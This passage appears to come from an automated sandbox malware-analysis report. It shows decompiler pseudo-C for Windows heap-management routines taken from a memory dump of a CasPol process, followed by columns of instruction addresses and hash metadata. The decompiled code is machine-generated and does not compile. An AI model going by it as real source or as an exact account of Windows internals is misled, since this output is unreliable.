							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E016DFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E016D23E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                                0x016e44a1
                                                                0x016e44a3
                                                                0x016e44a7
                                                                0x016e44ac
                                                                0x016e44af
                                                                0x016e44b2
                                                                0x016e44b9
                                                                0x016e44bc
                                                                0x016e47f2
                                                                0x016e47f2
                                                                0x016e47f8
                                                                0x016e47fc
                                                                0x016e47fe
                                                                0x016e4804
                                                                0x016e4805
                                                                0x016e4805
                                                                0x016e480c
                                                                0x016e4810
                                                                0x016e4812
                                                                0x016e4812
                                                                0x016e4812
                                                                0x016e4822
                                                                0x016e4822
                                                                0x016e4827
                                                                0x016e4827
                                                                0x00000000
                                                                0x016e4827
                                                                0x016e44c4
                                                                0x016e44d3
                                                                0x016e44d9
                                                                0x016e44dc
                                                                0x016e44de
                                                                0x016e44e0
                                                                0x016e4560
                                                                0x016e4520
                                                                0x016e4522
                                                                0x016e4525
                                                                0x016e4528
                                                                0x016e452b
                                                                0x016e452e
                                                                0x016e4530
                                                                0x016e4697
                                                                0x016e469d
                                                                0x016e46a1
                                                                0x016e46c0
                                                                0x016e46c5
                                                                0x016e46a3
                                                                0x016e46b8
                                                                0x016e46bd
                                                                0x016e46cb
                                                                0x016e46d4
                                                                0x016e4677
                                                                0x016e4677
                                                                0x016e4679
                                                                0x016e467c
                                                                0x016e468a
                                                                0x016e4690
                                                                0x016e4690
                                                                0x016e47f1
                                                                0x016e47f1
                                                                0x016e47f1
                                                                0x00000000
                                                                0x016e47f1
                                                                0x016e4536
                                                                0x016e4539
                                                                0x016e453c
                                                                0x016e4636
                                                                0x016e463c
                                                                0x016e4640
                                                                0x016e465f
                                                                0x016e4664
                                                                0x016e4642
                                                                0x016e4657
                                                                0x016e465c
                                                                0x016e4670
                                                                0x00000000
                                                                0x016e4542
                                                                0x016e4542
                                                                0x016e4546
                                                                0x016e4548
                                                                0x016e454b
                                                                0x016e4555
                                                                0x016e455b
                                                                0x016e455b
                                                                0x016e455b
                                                                0x016e455d
                                                                0x016e455d
                                                                0x016e455d
                                                                0x00000000
                                                                0x016e455d
                                                                0x016e453c
                                                                0x016e4579
                                                                0x016e457c
                                                                0x016e4587
                                                                0x016e4589
                                                                0x016e4591
                                                                0x016e4592
                                                                0x016e4597
                                                                0x016e4598
                                                                0x016e45a1
                                                                0x016e45ab
                                                                0x016e45ab
                                                                0x016e45a1
                                                                0x016e45ae
                                                                0x016e45b4
                                                                0x016e45b9
                                                                0x016e45bd
                                                                0x016e4759
                                                                0x016e4759
                                                                0x016e475f
                                                                0x016e4761
                                                                0x016e4763
                                                                0x016e4765
                                                                0x016e4768
                                                                0x016e476b
                                                                0x016e476d
                                                                0x016e479c
                                                                0x016e479c
                                                                0x016e479f
                                                                0x016e47a2
                                                                0x016e47a4
                                                                0x016e4830
                                                                0x016e4833
                                                                0x016e4879
                                                                0x016e487d
                                                                0x016e48f1
                                                                0x016e48f3
                                                                0x016e48f3
                                                                0x00000000
                                                                0x016e48f3
                                                                0x016e487f
                                                                0x016e4885
                                                                0x016e4887
                                                                0x016e48a8
                                                                0x016e48a8
                                                                0x016e48ae
                                                                0x016e48b0
                                                                0x016e48dc
                                                                0x016e48dc
                                                                0x016e48dc
                                                                0x016e48dc
                                                                0x016e48ec
                                                                0x00000000
                                                                0x016e48ec
                                                                0x016e48b2
                                                                0x016e48bc
                                                                0x016e48be
                                                                0x016e48c1
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e48c3
                                                                0x016e48c3
                                                                0x016e48c6
                                                                0x016e48c9
                                                                0x016e48cc
                                                                0x016e48d1
                                                                0x016e48d4
                                                                0x00000000
                                                                0x00000000
                                                                0x016e48d6
                                                                0x016e48d7
                                                                0x016e48da
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e48da
                                                                0x016e494f
                                                                0x016e4955
                                                                0x016e4959
                                                                0x016e4978
                                                                0x016e497d
                                                                0x016e495b
                                                                0x016e4970
                                                                0x016e4975
                                                                0x016e4986
                                                                0x016e4987
                                                                0x016e498a
                                                                0x016e498d
                                                                0x016e4997
                                                                0x016e47ef
                                                                0x016e47ef
                                                                0x016e47ef
                                                                0x00000000
                                                                0x016e47ef
                                                                0x016e4890
                                                                0x016e4890
                                                                0x016e4891
                                                                0x016e4891
                                                                0x016e4894
                                                                0x016e4897
                                                                0x016e489d
                                                                0x016e48a0
                                                                0x00000000
                                                                0x00000000
                                                                0x016e48a2
                                                                0x016e48a3
                                                                0x016e48a6
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e48a6
                                                                0x016e48fb
                                                                0x016e4901
                                                                0x016e4905
                                                                0x016e4924
                                                                0x016e4929
                                                                0x016e4907
                                                                0x016e491c
                                                                0x016e4921
                                                                0x016e492f
                                                                0x016e4935
                                                                0x016e4936
                                                                0x016e4939
                                                                0x016e4942
                                                                0x00000000
                                                                0x016e4947
                                                                0x016e4835
                                                                0x016e483b
                                                                0x016e483f
                                                                0x016e485e
                                                                0x016e4863
                                                                0x016e4841
                                                                0x016e4856
                                                                0x016e485b
                                                                0x016e4869
                                                                0x016e486c
                                                                0x016e486f
                                                                0x016e47e7
                                                                0x016e47e7
                                                                0x00000000
                                                                0x016e47ec
                                                                0x016e47aa
                                                                0x016e47b0
                                                                0x016e47b4
                                                                0x016e47d3
                                                                0x016e47d8
                                                                0x016e47b6
                                                                0x016e47cb
                                                                0x016e47d0
                                                                0x016e47de
                                                                0x016e47df
                                                                0x016e47e2
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e476f
                                                                0x016e476f
                                                                0x016e4778
                                                                0x016e4785
                                                                0x016e4787
                                                                0x016e478c
                                                                0x016e478e
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4790
                                                                0x016e4792
                                                                0x016e4794
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4796
                                                                0x016e4799
                                                                0x00000000
                                                                0x016e4799
                                                                0x00000000
                                                                0x016e45c3
                                                                0x016e45c3
                                                                0x016e45c7
                                                                0x016e45c7
                                                                0x016e45ca
                                                                0x016e45cf
                                                                0x016e45d3
                                                                0x016e45df
                                                                0x016e45e4
                                                                0x016e45e6
                                                                0x016e45e8
                                                                0x016e45ed
                                                                0x016e45ed
                                                                0x016e45f2
                                                                0x016e45f2
                                                                0x016e45f7
                                                                0x016e45fc
                                                                0x016e4602
                                                                0x016e4606
                                                                0x016e4609
                                                                0x016e460f
                                                                0x016e46de
                                                                0x016e46e3
                                                                0x016e46e5
                                                                0x016e46ec
                                                                0x016e46ee
                                                                0x016e46f6
                                                                0x016e46f6
                                                                0x016e46f6
                                                                0x016e46f6
                                                                0x016e46ec
                                                                0x016e4615
                                                                0x016e4615
                                                                0x016e461d
                                                                0x016e462e
                                                                0x016e462e
                                                                0x016e461d
                                                                0x016e460f
                                                                0x016e4609
                                                                0x016e46fd
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4710
                                                                0x016e471a
                                                                0x016e4720
                                                                0x016e4720
                                                                0x016e4722
                                                                0x016e472c
                                                                0x00000000
                                                                0x016e472e
                                                                0x016e472e
                                                                0x00000000
                                                                0x016e472e
                                                                0x016e472c
                                                                0x016e4738
                                                                0x016e473c
                                                                0x016e474b
                                                                0x016e4751
                                                                0x016e4751
                                                                0x00000000
                                                                0x016e473c
                                                                0x016e48f4
                                                                0x016e48f4
                                                                0x00000000
                                                                0x016e48f4

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                • API String ID: 0-1357697941
                                                                • Opcode ID: e62e5642ffebf3f968ba5d42f74f1b06d3c02b54ea84a095697e351bf55c4522
                                                                • Instruction ID: c354e8cf366179c4ed64f68c740f97c33cbeb53464c89a0f30de9b13ac8f0e82
                                                                • Opcode Fuzzy Hash: e62e5642ffebf3f968ba5d42f74f1b06d3c02b54ea84a095697e351bf55c4522
                                                                • Instruction Fuzzy Hash: 40F10E31602656DFDB25CFA9C888BAABBF2FF05300F198259E546D7641CB30A985CB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164A309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 72%
                                                                			E0164A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x1718a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0164A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0164DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E01629373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E0162A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x1718748 - 1;
						if( *0x1718748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0162B150();
								__eflags =  *0x1717bc8;
								if( *0x1717bc8 == 0) {
									__eflags = 1;
									E016E2073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x1718748 - 1;
							if( *0x1718748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0165174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E01647D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E016E14FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E01629373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E01629819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x1718748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E0162B150();
											} else {
												E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E0162B150();
											_pop(_t491);
											__eflags =  *0x1717bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E016E2073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E016EA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0164A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E01647D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E01647D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E016E1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E01647D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E01647D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x1718748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E0162B150();
							} else {
								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E0162B150();
							__eflags =  *0x1717bc8;
							if( *0x1717bc8 == 0) {
								__eflags = 0;
								E016E2073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x1718748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E0162B150();
												} else {
													E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E0162B150();
												__eflags =  *0x1717bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E016E2073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E016EA80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0164A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0164B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0164A830(_t553, _v64, _v24);
								_t286 = E01647D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E01647D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E016E1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E01647D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E01647D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E016E1411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0165174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0164B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E01647D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E016E14FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E016499BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0164A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0165ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                0x0164a309
                                                                0x0164a316
                                                                0x0164a319
                                                                0x0164a31d
                                                                0x0164a32d
                                                                0x0164a331
                                                                0x01691e0d
                                                                0x01691e10
                                                                0x0164a3cb
                                                                0x0164a3cb
                                                                0x0164a3bd
                                                                0x0164a3c3
